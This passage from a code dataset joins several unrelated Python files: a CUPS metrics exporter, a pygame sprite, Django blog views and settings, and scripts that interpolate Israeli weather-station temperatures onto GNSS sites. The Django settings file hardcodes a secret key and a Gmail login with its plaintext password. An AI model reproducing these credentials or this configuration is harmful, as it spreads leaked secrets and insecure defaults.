sys.exit(-1)\n elif not ho and role in optional:\n logging.error(\"No HardwareObject with role %s\", role)\n else:\n logging.info(\"Nound HardwareObject %s\", role)\n\n setattr(self, role, ho)\n\n\n def get_shutters(self):\n return self._shutters\n","sub_path":"external/SAXHO/Beamline.py","file_name":"Beamline.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"466732798","text":"import pygame\r\nimport random\r\nfrom random import randint\r\nfrom ElementGraphique import ElementGraphique\r\n\r\nclass ElementGraphiqueAnimee(ElementGraphique):\r\n\t# Le constructeur basique\r\n\tdef __init__(self, img=[],x=0,y=0,effect=None) :\r\n\t\tself.image = img\r\n\t\tself.fps = 0\r\n\t\tself.numimage = 0\r\n\t\tself.deltaX = 10\r\n\t\tself.deltaY = 10\r\n\t\tself.rect = self.image[self.numimage].get_rect()\r\n\t\tself.rect.x = x\r\n\t\tself.rect.y = y\r\n\t\tself.alive = True\r\n\t\tself.effect = effect\r\n\r\n\tdef afficher(self, window) :\r\n\t\tself.fps += 1\r\n\t\tif (self.fps % 1 )== 0:\r\n\t\t\tself.numimage = (self.numimage + 1)%len(self.image)\r\n\t\t\twindow.blit(self.image[self.numimage],self.rect)\r\n\r\n\tdef Deplacer(self, window):\r\n\t\tlargeur, hauteur = window.get_size()\r\n\t\tself.rect.x += self.deltaX\r\n\t\tif self.rect.x <= -10 or self.rect.x >= largeur-self.rect.w :\r\n\t\t\tself.deltaX = - self.deltaX\r\n\t\t\tself.rect.x = self.rect.x\r\n\r\n\t\tself.rect.y += self.deltaY\r\n\t\tif self.rect.y <= 0 or self.rect.y >= hauteur-self.rect.h :\r\n\t\t\tself.deltaY = - self.deltaY\r\n\t\t\tself.rect.y = self.rect.y","sub_path":"Group/Jeux video/genrePacmanProject/Jeux video/ElementGraphiqueAnimee.py","file_name":"ElementGraphiqueAnimee.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"526104058","text":"#!/usr/bin/env python3\nimport cups\nimport json\nimport time\nfrom prometheus_client import start_http_server, Gauge, Counter\nimport argparse\n\nparser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\nparser.add_argument(\"--cups-host\", help=\"The cups host to connect to\", default=\"localhost\")\nparser.add_argument(\"--cups-port\", type=int, help=\"The cups port to use\", default=631)\nparser.add_argument(\"--cups-user\", help=\"The user to connect with\", default=\"default\")\nparser.add_argument(\"--listen-port\", type=int, help=\"The port the exporter will listen on\", default=9329)\nargs = parser.parse_args()\n\n\n# Define Metrics\nprintJobsNum = Gauge('cups_print_jobs_active', 'Number of current print jobs')\nprintJobsTotal = Counter('cups_print_jobs_total', 'Total number of print jobs')\nprintersNum = Gauge('cups_printers', 'Number of printers')\nprintersStatus = Gauge('cups_printer_status', 'Status about printer alerts', ['printer','model', 'status'])\ncupsUp = Gauge('cups_up', 'CUPS up')\n\n\ndef getPrinterData(conn):\n printers = conn.getPrinters()\n printersNum.set(len(printers))\n return printers\n\ndef getJobData(conn):\n jobs = []\n printJobsTotalold = printJobsTotal._value.get()\n jobs = conn.getJobs(which_jobs=\"all\")\n lastjobID = jobs.keys()[-1]\n printJobsTotalnew = lastjobID\n printJobsTotal.inc(printJobsTotalnew - printJobsTotalold)\n jobs = conn.getJobs()\n printJobsNum.set(len(jobs))\n\n\ndef getPrinterStatus(printers):\n for key, value in printers.items():\n if value['printer-state-reasons'][0] != 'none':\n printersStatus.labels(printer=key, model=value['printer-make-and-model'], status=value['printer-state-reasons'][0]).set(0)\n else:\n printersStatus.labels(printer=key, model=value['printer-make-and-model'], status='happy').set(1)\n\n\nif __name__ == '__main__':\n # Start up the server to expose the metrics.\n start_http_server(args.listen_port)\n\n cups.setServer(args.cups_host)\n cups.setPort(args.cups_port)\n cups.setUser(args.cups_user)\n\n while True:\n try:\n conn = cups.Connection()\n printers = getPrinterData(conn)\n getJobData(conn)\n getPrinterStatus(printers)\n cupsUp.set(1)\n except Exception as e:\n cupsUp.set(0)\n print(e)\n\n time.sleep(5)\n\n","sub_path":"cups_exporter.py","file_name":"cups_exporter.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"262535931","text":"import os\nimport sys\nfrom tqdm import tqdm\n\n\ndef readFile(filepath):\n f = open(filepath)\n content = f.read()\n f.close()\n return content.splitlines()\n\nif __name__ == '__main__':\n # threshold = str(sys.argv[1])\n filename = str(sys.argv[1])\n extra = int(sys.argv[2])\n # path = os.getcwd() + '/Cov/activeneuron/' + threshold + 'ase/'\n path = os.getcwd() + '/input/'\n # cov = readFile(path + 'neuron_cov')\n cov = readFile(path + filename)\n cnum = len(cov[0])\n nnum = len(cov)\n # f = open(path + 'test_cov','w')\n f = open(path + 'test_cov_' + filename, 'w')\n for i in tqdm(range(cnum)):\n tstr = ''\n for j in range(nnum):\n if cov[j][i] == '1':\n tstr += '1'\n else:\n tstr += '0'\n f.write(tstr + '\\n')\n f.close()\n\n","sub_path":"cifar100/1_nin/2process.py","file_name":"2process.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"471840775","text":"\"\"\"\nDjango settings for cloudserv project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.7/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.7/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os\nBASE_DIR = os.path.dirname(os.path.dirname(__file__))\n\n\nSETTINGS_DIR = os.path.dirname(__file__)\n\nPROJECT_PATH = os.path.join(SETTINGS_DIR, os.pardir)\n\nPROJECT_PATH = os.path.abspath(PROJECT_PATH)\nSCRIPTS_DIR = os.path.join(PROJECT_PATH, 'shellscripts')\n\n\nTEMPLATE_PATH = os.path.join(PROJECT_PATH, 'templates')\n\n\nLOGIN_URL = '/admin/login/'\n# Quick-start development settings - unsuitable for production\n# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = 'p43_9v+9xlxzv0*!77639@hr3s4fb@taa5ky&_xsjgu(i4v3!+'\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = True\n\nTEMPLATE_DEBUG = True\n\nALLOWED_HOSTS = []\n\n\n# Application definition\n\nINSTALLED_APPS = (\n #'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'administrator',\n 'cloudservmodels',\n 'rest_framework',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.auth.middleware.SessionAuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'cloudserv.urls'\n\nWSGI_APPLICATION = 'cloudserv.wsgi.application'\n\nAUTH_USER_MODEL = 'cloudservmodels.CloudServUser'\n\n# Database\n# https://docs.djangoproject.com/en/1.7/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql',\n 'NAME': 'cloudserv', # Or path to database file if using sqlite3.,\n 'USER': 'root', # Not used with sqlite3.\n 'PASSWORD': '', # Not used with sqlite3.\n 'HOST': 'localhost', \n 'PORT': '3306',\n }\n}\n\n#Email configuration\nEMAIL_USE_TLS = False\nEMAIL_HOST = 'smtp.gmail.com'\nEMAIL_HOST_USER = 'qa.cycloides@gmail.com'\nEMAIL_HOST_PASSWORD = 'bolo.mailer'\nEMAIL_PORT = 587\nEMAIL_FROM_ADDRESS = 'qa.cycloides@gmail.com'\nEMAIL_USE_TLS = True\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.7/topics/i18n/\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.7/howto/static-files/\n\nSTATIC_URL = '/static/'\nSTATIC_URL = '/static/'\nSTATIC_FILE_PATH = os.path.join(PROJECT_PATH, 'static')\nSTATICFILES_DIRS = (STATIC_FILE_PATH,)\nTEMPLATE_DIRS = (TEMPLATE_PATH,)\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(PROJECT_PATH, 'media')\n\nIMAGES_DIR = os.path.join(STATIC_URL, 'images')\n\nLOGO_DIR = os.path.join(IMAGES_DIR, 'logos')\n\nLOGO_STORAGE = os.path.join(STATIC_FILE_PATH, 'images/logos')\n","sub_path":"cloudserv/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"455513816","text":"import numpy as np\n\nsearch = [-50,-68,-70,-65,-78,-55]\n\nB1A = [-46,-78,-72,-70,-81,-59]\nB1B = [None,-82,-85,None,-76,-55]\nB1C = [None,None,None,-78,None,-58]\nB2A = [None,-88,None,None,None,-60]\nB2B = [None,-78,-79,-80,-80,-59]\nteste = [-51,-68,-70,-65,-78,-55]\nresult = []\n\nfor vetor in [B1A, B1B, B1C, B2A, B2B, teste]:\n #retorna true ou false se for igual\n #if np.array_equal(search,vetor):\n # result = vetor\n\n if np.allclose(search,vetor):\n print(vetor)\n\n #print(result)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"494579691","text":"\nfrom django.contrib.auth.models import User\nfrom django.shortcuts import render, redirect, render_to_response, get_object_or_404\nfrom .models import Post,Message,ResourceGroup,ResourceItem\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\nimport markdown\nfrom django.views.generic import ListView\nfrom .forms import CommentForm,MessageForm\nfrom taggit.models import Tag\nfrom django.db.models import Count\nfrom . import mail\n# Create your views here.\n\n#文章列表类\nclass postListView(ListView):\n queryset = Post.published.all()\n context_object_name = 'posts'\n paginate_by = 5\n template_name = 'blogsite/post/index.html'\n\n\n\n# 文章列表\ndef post_list(request,tag_slug=None):\n object_list=Post.published.all()\n\n #标签筛选 如果有标签则选择符合标签的\n tag=None\n if tag_slug:\n tag=get_object_or_404(Tag,slug=tag_slug)\n object_list=object_list.filter(tags__in=[tag])\n\n #分页\n paginator = Paginator(object_list,5) #每5篇文章一页\n page=request.GET.get('page')\n try:\n posts=paginator.page(page)\n except PageNotAnInteger:\n #如果page不是一个int,返回第一页\n posts=paginator.page(1)\n except EmptyPage:\n #如果为空\n posts=paginator.page(paginator.num_pages)\n\n return render(request,\n 'blogsite/post/index.html',\n {'posts': posts,\n 'tag':tag})\n\n# 文章细节\ndef post_detail(request, post):\n post = get_object_or_404(Post, slug=post,status='published')\n post.body= markdown.markdown(post.body.replace(\"\\r\\n\", '\\n'),extensions=[\n 'extra',\n 'codehilite',\n 'toc',\n ])\n\n #评论列表\n comments=post.comments.filter(active=True)\n #标签\n tags=Tag.objects.all()\n\n if request.method == 'POST':\n #一个评论提交\n comment_form=CommentForm(data=request.POST)\n\n #有效创建一个评论\n if comment_form.is_valid():\n new_comment=comment_form.save(commit=False)\n new_comment.post=post\n new_comment.save()\n else:\n comment_form=CommentForm()\n\n #相似的文章\n post_tags_ids = post.tags.values_list('id', flat=True)\n similar_posts = Post.published.filter(tags__in=post_tags_ids) \\\n .exclude(id=post.id)\n similar_posts = similar_posts.annotate(same_tags=Count('tags')) \\\n .order_by('-same_tags', '-publish')[:4]\n\n return render(request,'blogsite/post/detail.html',{'post': post,\n 'comments':comments,\n 'comment_form':comment_form,\n 'similar_posts':similar_posts,\n 'tags':tags})\n#归档\ndef archives(request):\n\n posts=Post.objects.all().values('create','title','slug')\n return render(request,'blogsite/post/archives.html',{'posts':posts})\n\n#留言\ndef gustbook(request):\n #已有的留言\n messages=Message.objects.all()\n #数量\n nums=messages.count()\n\n #提交留言\n if request.method == 'POST':\n #一个留言提交\n message_form=MessageForm(data=request.POST)\n\n #有效创建一个留言\n if message_form.is_valid():\n message_form.save()#保存\n try:\n sender_mail=str(message_form[\"email\"].value())\n sender_name=str(message_form[\"name\"].value())\n sender_msg=str(message_form[\"body\"].value())\n mail.sentemail(sender_mail,sender_name,sender_msg)\n except Exception:\n print(\"发送邮件出错\")\n else:\n message_form=MessageForm()\n\n # 分页\n paginator = Paginator(messages, 5) # 每5篇文章一页\n page = request.GET.get('page')\n try:\n messages = paginator.page(page)\n except PageNotAnInteger:\n # 如果page不是一个int,返回第一页\n messages= paginator.page(1)\n except EmptyPage:\n # 如果为空\n messages= paginator.page(paginator.num_pages)\n return render(request,'blogsite/post/gustbook.html',{'messages':messages,\n 'nums':nums,\n 'message_form':message_form})\n#搜索\ndef search(request):\n #获取参数\n s=request.GET.get('s')\n\n #\n error_msg = ''\n if not s:\n error_msg = '请输入关键词'\n\n #对标题进行简单的搜索\n post_list = Post.objects.filter(title__icontains=s)\n return render(request,\"blogsite/post/search.html\",{'error_msg':error_msg,\n 'post_list':post_list,\n 'key_word':s})\n\n\n#资源分享\ndef resource(request):\n\n resource=[]\n\n #获得所有的Group分类\n groups=ResourceGroup.objects.all()\n\n #对每个goup取得对应的的item\n for group in groups:\n items=ResourceItem.objects.filter(group=group)\n resource.append([group,items])\n\n return render(request,\"blogsite/post/resource.html\",{'resource':resource})\n","sub_path":"myblog/blogsite/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"141932017","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jun 10 17:22:51 2019\n\n@author: ziskin\n\"\"\"\nfrom PW_paths import work_yuval\nfrom pathlib import Path\nims_path = work_yuval / 'IMS_T'\ngis_path = work_yuval / 'gis'\nims_10mins_path = ims_path / '10mins'\nawd_path = work_yuval/'AW3D30'\ncwd = Path().cwd()\n# fill missing data:\n#some_missing = ds.tmin.sel(time=ds['time.day'] > 15).reindex_like(ds)\n#\n#In [20]: filled = some_missing.groupby('time.month').fillna(climatology.tmin)\n#\n#In [21]: both = xr.Dataset({'some_missing': some_missing, 'filled': filled})\n\n\ndef clip_raster(fp=awd_path/'Israel_Area.tif',\n out_tif=awd_path/'israel_dem.tif',\n minx=34.0, miny=29.0, maxx=36.5, maxy=34.0):\n def getFeatures(gdf):\n \"\"\"Function to parse features from GeoDataFrame in such a manner that\n rasterio wants them\"\"\"\n import json\n return [json.loads(gdf.to_json())['features'][0]['geometry']]\n\n import rasterio\n from rasterio.plot import show\n from rasterio.plot import show_hist\n from rasterio.mask import mask\n from shapely.geometry import box\n import geopandas as gpd\n from fiona.crs import from_epsg\n import pycrs\n print('reading {}'.format(fp))\n data = rasterio.open(fp)\n # create bounding box using shapely:\n bbox = box(minx, miny, maxx, maxy)\n # insert the bbox into a geodataframe:\n geo = gpd.GeoDataFrame({'geometry': bbox}, index=[0], crs=from_epsg(4326))\n # re-project with the same projection as the data:\n geo = geo.to_crs(crs=data.crs.data)\n # get the geometry coords:\n coords = getFeatures(geo)\n # clipping is done with mask:\n out_img, out_transform = mask(dataset=data, shapes=coords, crop=True)\n # copy meta data:\n out_meta = data.meta.copy()\n # parse the epsg code:\n epsg_code = int(data.crs.data['init'][5:])\n # update the meta data:\n out_meta.update({\"driver\": \"GTiff\",\n \"height\": out_img.shape[1],\n \"width\": out_img.shape[2],\n \"transform\": out_transform,\n \"crs\": pycrs.parse.from_epsg_code(epsg_code).to_proj4()})\n # save to disk:\n print('saving {} to disk.'.format(out_tif))\n with rasterio.open(out_tif, \"w\", **out_meta) as dest:\n dest.write(out_img)\n print('Done!')\n return\n\n\ndef create_israel_area_dem(path):\n \"\"\"merge the raw DSM tif files from AW3D30 model of Israel area togather\"\"\"\n from aux_gps import path_glob\n import rasterio\n from rasterio.merge import merge\n src_files_to_mosaic = []\n files = path_glob(path, '*DSM*.tif')\n for fp in files:\n src = rasterio.open(fp)\n src_files_to_mosaic.append(src)\n mosaic, out_trans = merge(src_files_to_mosaic)\n out_meta = src.meta.copy()\n out_meta.update({\"driver\": \"GTiff\",\n \"height\": mosaic.shape[1],\n \"width\": mosaic.shape[2],\n \"transform\": out_trans,\n \"crs\": src.crs\n }\n )\n with rasterio.open(path/'Israel_Area.tif', \"w\", **out_meta) as dest:\n dest.write(mosaic)\n return\n\n\ndef parse_cv_results(grid_search_cv):\n from aux_gps import process_gridsearch_results\n \"\"\"parse cv_results from GridsearchCV object\"\"\"\n # only supports neg-abs-mean-error with leaveoneout\n from sklearn.model_selection import LeaveOneOut\n if (isinstance(grid_search_cv.cv, LeaveOneOut)\n and grid_search_cv.scoring == 'neg_mean_absolute_error'):\n\n cds = process_gridsearch_results(grid_search_cv)\n cds = - cds\n return cds\n\n\ndef IMS_interpolating_to_GNSS_stations_israel(dt='2013-10-19T22:00:00',\n stations=None,\n lapse_rate='auto',\n method='okrig',\n variogram='spherical',\n n_neighbors=3,\n start_year='1996',\n cut_days_ago=3,\n plot=False,\n verbose=False,\n savepath=ims_path):\n from pykrige.rk import Krige\n import pandas as pd\n from aux_gps import path_glob\n import xarray as xr\n import numpy as np\n import seaborn as sns\n import matplotlib.pyplot as plt\n import geopandas as gpd\n from sklearn.neighbors import KNeighborsRegressor\n # import time\n\n def pick_model(method, variogram, n_neighbors):\n if method == 'okrig':\n if variogram is not None:\n model = Krige(method='ordinary', variogram_model=variogram,\n verbose=verbose)\n else:\n model = Krige(method='ordinary', variogram_model='linear',\n verbose=verbose)\n elif method == 'knn':\n if n_neighbors is None:\n model = KNeighborsRegressor(n_neighbors=5, weights='distance')\n else:\n model = KNeighborsRegressor(n_neighbors=n_neighbors, weights='distance')\n else:\n raise Exception('{} is not supported yet...'.format(method))\n return model\n\n def prepare_Xy(ts_lr_neutral, T_lats, T_lons):\n import numpy as np\n df = ts_lr_neutral.to_frame()\n df['lat'] = T_lats\n df['lon'] = T_lons\n # df = df.dropna(axis=0)\n c = np.linspace(\n df['lat'].min().item(),\n df['lat'].max().item(),\n df['lat'].shape[0])\n r = np.linspace(\n df['lon'].min().item(),\n df['lon'].max().item(),\n df['lon'].shape[0])\n rr, cc = np.meshgrid(r, c)\n vals = ~np.isnan(ts_lr_neutral)\n X = np.column_stack([rr[vals, vals], cc[vals, vals]])\n # rr_cc_as_cols = np.column_stack([rr.flatten(), cc.flatten()])\n # y = da_scaled.values[vals]\n y = ts_lr_neutral[vals]\n return X, y\n\n def neutrilize_t(ts_vs_alt, lapse_rate):\n ts_lr_neutral = (ts_vs_alt +\n lapse_rate *\n ts_vs_alt.index /\n 1000.0)\n return ts_lr_neutral\n\n def choose_dt_and_lapse_rate(tdf, dt, T_alts, lapse_rate):\n ts = tdf.loc[dt, :]\n # dt_col = dt.strftime('%Y-%m-%d %H:%M')\n # ts.name = dt_col\n # Tloc_df = Tloc_df.join(ts, how='right')\n # Tloc_df = Tloc_df.dropna(axis=0)\n ts_vs_alt = pd.Series(ts.values, index=T_alts)\n ts_vs_alt_for_fit = ts_vs_alt.dropna()\n [a, b] = np.polyfit(ts_vs_alt_for_fit.index.values,\n ts_vs_alt_for_fit.values, 1)\n if lapse_rate == 'auto':\n lapse_rate = np.abs(a) * 1000\n if lapse_rate < 5.0:\n lapse_rate = 5.0\n elif lapse_rate > 10.0:\n lapse_rate = 10.0\n return ts_vs_alt, lapse_rate\n# import time\n dt = pd.to_datetime(dt)\n # read Israeli GNSS sites coords:\n df = pd.read_csv(\n cwd /\n 'israeli_gnss_coords.txt',\n delim_whitespace=True,\n header=0)\n # use station=None to pick all stations, otherwise pick one...\n if stations is not None:\n if isinstance(stations, str):\n stations = [stations]\n df = df.loc[stations, :]\n print('selected only {} stations'.format(stations))\n else:\n print('selected all israeli stations.')\n # prepare lats and lons of gnss sites:\n gps_lats = np.linspace(df.lat.min(), df.lat.max(), df.lat.values.shape[0])\n gps_lons = np.linspace(df.lon.min(), df.lon.max(), df.lon.values.shape[0])\n gps_lons_lats_as_cols = np.column_stack([gps_lons, gps_lats])\n # load IMS temp data:\n glob_str = 'IMS_TD_israeli_10mins*.nc'\n file = path_glob(ims_path, glob_str=glob_str)[0]\n ds = xr.open_dataset(file)\n time_dim = list(set(ds.dims))[0]\n # slice to a starting year(1996?):\n ds = ds.sel({time_dim: slice(start_year, None)})\n years = sorted(list(set(ds[time_dim].dt.year.values)))\n # get coords and alts of IMS stations:\n T_alts = np.array([ds[x].attrs['station_alt'] for x in ds])\n T_lats = np.array([ds[x].attrs['station_lat'] for x in ds])\n T_lons = np.array([ds[x].attrs['station_lon'] for x in ds])\n print('loading IMS_TD of israeli stations 10mins freq..')\n # transform to dataframe and add coords data to df:\n tdf = ds.to_dataframe()\n if cut_days_ago is not None:\n # use cut_days_ago to drop last x days of data:\n # this is vital bc towards the newest data, TD becomes scarce bc not\n # all of the stations data exists...\n n = cut_days_ago * 144\n tdf.drop(tdf.tail(n).index, inplace=True)\n print('last date to be handled is {}'.format(tdf.index[-1]))\n # use this to solve for a specific datetime:\n if dt is not None:\n dt_col = dt.strftime('%Y-%m-%d %H:%M')\n# t0 = time.time()\n # prepare the ims coords and temp df(Tloc_df) and the lapse rate:\n ts_vs_alt, lapse_rate = choose_dt_and_lapse_rate(tdf, dt, T_alts, lapse_rate)\n if plot:\n fig, ax_lapse = plt.subplots(figsize=(10, 6))\n sns.regplot(x=ts_vs_alt.index, y=ts_vs_alt.values, color='r',\n scatter_kws={'color': 'b'}, ax=ax_lapse)\n suptitle = dt.strftime('%Y-%m-%d %H:%M')\n ax_lapse.set_xlabel('Altitude [m]')\n ax_lapse.set_ylabel('Temperature [degC]')\n ax_lapse.text(0.5, 0.95, 'Lapse_rate: {:.2f} degC/km'.format(lapse_rate),\n horizontalalignment='center', verticalalignment='center',\n transform=ax_lapse.transAxes, fontsize=12, color='k',\n fontweight='bold')\n ax_lapse.grid()\n ax_lapse.set_title(suptitle, fontsize=14, fontweight='bold')\n # neutrilize the lapse rate effect:\n ts_lr_neutral = neutrilize_t(ts_vs_alt, lapse_rate)\n # prepare the regressors(IMS stations coords) and the\n # target(IMS temperature at the coords):\n X, y = prepare_Xy(ts_lr_neutral, T_lats, T_lons)\n # pick the model and params:\n model = pick_model(method, variogram, n_neighbors)\n # fit the model:\n model.fit(X, y)\n # predict at the GNSS stations coords:\n interpolated = model.predict(gps_lons_lats_as_cols).reshape((gps_lats.shape))\n # add prediction to df:\n df[dt_col] = interpolated\n # fix for lapse rate:\n df[dt_col] -= lapse_rate * df['alt'] / 1000.0\n # concat gnss stations and Tloc DataFrames:\n Tloc_df = pd.DataFrame(T_lats, index=tdf.columns)\n Tloc_df.columns = ['lat']\n Tloc_df['lon'] = T_lons\n Tloc_df['alt'] = T_alts\n all_df = pd.concat([df, Tloc_df],axis=0)\n # fname = gis_path / 'ne_10m_admin_0_sovereignty.shp'\n # fname = gis_path / 'gadm36_ISR_0.shp'\n # ax = plt.axes(projection=ccrs.PlateCarree())\n if plot:\n fig, ax = plt.subplots(figsize=(6, 10))\n # shdf = salem.read_shapefile(salem.get_demo_file('world_borders.shp'))\n # shdf = salem.read_shapefile(gis_path / 'Israel_and_Yosh.shp')\n isr = gpd.read_file(gis_path / 'Israel_and_Yosh.shp')\n # shdf = shdf.loc[shdf['CNTRY_NAME'] == 'Israel'] # remove other countries\n isr.crs = {'init': 'epsg:4326'}\n time_snap = gpd.GeoDataFrame(all_df, geometry=gpd.points_from_xy(all_df.lon,\n all_df.lat),\n crs=isr.crs)\n time_snap = gpd.sjoin(time_snap, isr, op='within')\n isr.plot(ax=ax)\n cmap = plt.get_cmap('rainbow', 10)\n time_snap.plot(ax=ax, column=dt_col, cmap=cmap,\n edgecolor='black', legend=True)\n for x, y, label in zip(df.lon, df.lat,\n df.index):\n ax.annotate(label, xy=(x, y), xytext=(3, 3),\n textcoords=\"offset points\")\n suptitle = dt.strftime('%Y-%m-%d %H:%M')\n fig.suptitle(suptitle, fontsize=14, fontweight='bold')\n else:\n # do the above (except plotting) for the entire data, saving each year:\n for year in years:\n dts = tdf.index[tdf.index.year == year]\n # read Israeli GNSS sites coords again:\n df = pd.read_csv(\n cwd /\n 'israeli_gnss_coords.txt',\n delim_whitespace=True,\n header=0)\n cnt = 1\n dt_col_list = []\n inter_list = []\n # t0 = time.time()\n# t1 = time.time()\n# t2 = time.time()\n# t3 = time.time()\n# t4 = time.time()\n# t5 = time.time()\n# t6 = time.time()\n# t7 = time.time()\n# t8 = time.time()\n for dt in dts:\n dt_col = dt.strftime('%Y-%m-%d %H:%M')\n if np.mod(cnt, 144) == 0:\n # t1 = time.time()\n print('working on {}'.format(dt_col)) \n # print('time1:{:.2f} seconds'.format(t1-t0))\n # t0 = time.time()\n # prepare the ims coords and temp df(Tloc_df) and\n # the lapse rate:\n ts_vs_alt, lapse_rate = choose_dt_and_lapse_rate(tdf, dt, T_alts, lapse_rate)\n# if np.mod(cnt, 144) == 0:\n# t2 = time.time()\n# print('time2: {:.4f}'.format((t2-t1)*144))\n # neutrilize the lapse rate effect:\n ts_lr_neutral = neutrilize_t(ts_vs_alt, lapse_rate)\n # prepare the regressors(IMS stations coords) and the\n # target(IMS temperature at the coords):\n# if np.mod(cnt, 144) == 0:\n# t3 = time.time()\n# print('time3: {:.4f}'.format((t3-t2)*144))\n X, y = prepare_Xy(ts_lr_neutral, T_lats, T_lons)\n# if np.mod(cnt, 144) == 0:\n# t4 = time.time()\n# print('time4: {:.4f}'.format((t4-t3)*144))\n # pick model and params:\n model = pick_model(method, variogram, n_neighbors)\n# if np.mod(cnt, 144) == 0:\n# t5 = time.time()\n# print('time5: {:.4f}'.format((t5-t4)*144))\n # fit the model:\n model.fit(X, y)\n# if np.mod(cnt, 144) == 0:\n# t6 = time.time()\n# print('time6: {:.4f}'.format((t6-t5)*144))\n # predict at the GNSS stations coords:\n interpolated = model.predict(gps_lons_lats_as_cols).reshape((gps_lats.shape))\n# if np.mod(cnt, 144) == 0:\n# t7 = time.time()\n# print('time7: {:.4f}'.format((t7-t6)*144))\n # fix for lapse rate:\n interpolated -= lapse_rate * df['alt'].values / 1000.0\n# if np.mod(cnt, 144) == 0:\n# t8 = time.time()\n# print('time8: {:.4f}'.format((t8-t7)*144))\n # add to list:\n dt_col_list.append(dt_col)\n inter_list.append(interpolated)\n cnt += 1\n # convert to dataset:\n # da = xr.DataArray(df.iloc[:, 3:].values, dims=['station', 'time'])\n da = xr.DataArray(inter_list, dims=['time', 'station'])\n da['station'] = df.index\n da['time'] = pd.to_datetime(dt_col_list)\n da = da.sortby('time')\n ds = da.to_dataset(dim='station')\n for da in ds:\n ds[da].attrs['units'] = 'degC'\n filename = 'GNSS_TD_{}.nc'.format(year)\n ds.to_netcdf(savepath / filename, 'w')\n print('saved {} to {}'.format(filename, savepath))\n # return\n print('concatenating all TD years...')\n concat_GNSS_TD(savepath)\n# t1 = time.time()\n # geo_snap = geo_pandas_time_snapshot(var='TD', datetime=dt, plot=False)\n# total = t1-t0\n# print(total)\n return\n\n\ndef resample_GNSS_TD(path=ims_path):\n from aux_gps import path_glob\n import xarray as xr\n\n def resample_GNSS_TD(ds, path, sample, sample_rate='1H'):\n # station = da.name\n print('resampaling all GNSS stations to {}'.format(sample[sample_rate]))\n years = [str(x)\n for x in sorted(list(set(ds[time_dim].dt.year.values)))]\n ymin = ds[time_dim].min().dt.year.item()\n ymax = ds[time_dim].max().dt.year.item()\n years_str = '{}_{}'.format(ymin, ymax)\n if sample_rate == '1H' or sample_rate == '3H':\n dsr_list = []\n for year in years:\n print('resampling {} of year {}'.format(sample_rate, year))\n dsr = ds.sel({time_dim: year}).resample(\n {time_dim: sample_rate}, keep_attrs=True, skipna=True).mean(keep_attrs=True)\n dsr_list.append(dsr)\n print('concatenating...')\n dsr = xr.concat(dsr_list, time_dim)\n else:\n if sample_rate == '5min':\n dsr = ds.resample({time_dim: sample_rate}, keep_attrs=True,\n skipna=True).ffill()\n else:\n dsr = ds.resample({time_dim: sample_rate},\n keep_attrs=True,\n skipna=True).mean(keep_attrs=True)\n new_filename = '_'.join(['GNSS', sample[sample_rate], 'TD_ALL',\n years_str])\n new_filename = new_filename + '.nc'\n print('saving all resmapled GNSS stations to {}'.format(path))\n comp = dict(zlib=True, complevel=9) # best compression\n encoding = {var: comp for var in dsr.data_vars}\n dsr.to_netcdf(path / new_filename, 'w', encoding=encoding)\n print('Done resampling!')\n return\n # first, load GNSS_TD_ALL:\n str_glob = 'GNSS_TD_ALL*.nc'\n file = path_glob(path, str_glob)[0]\n ds = xr.open_dataset(file)\n ds.load()\n time_dim = list(set(ds.dims))[0]\n sample = {'5min': '5mins', '1H': 'hourly', '3H': '3hourly',\n 'D': 'Daily', 'W': 'weekly', 'MS': 'monthly'}\n for key in sample.keys():\n resample_GNSS_TD(ds, path, sample, sample_rate=key)\n \n# for sta in stations:\n# # take each station's TD and copy to GNSS folder 'temperature':\n# savepath = GNSS / sta / 'temperature'\n# savepath.mkdir(parents=True, exist_ok=True)\n# # first save a 5-min resampled version and save:\n# da = ds[sta].resample(time='5min').ffill()\n# ymin = 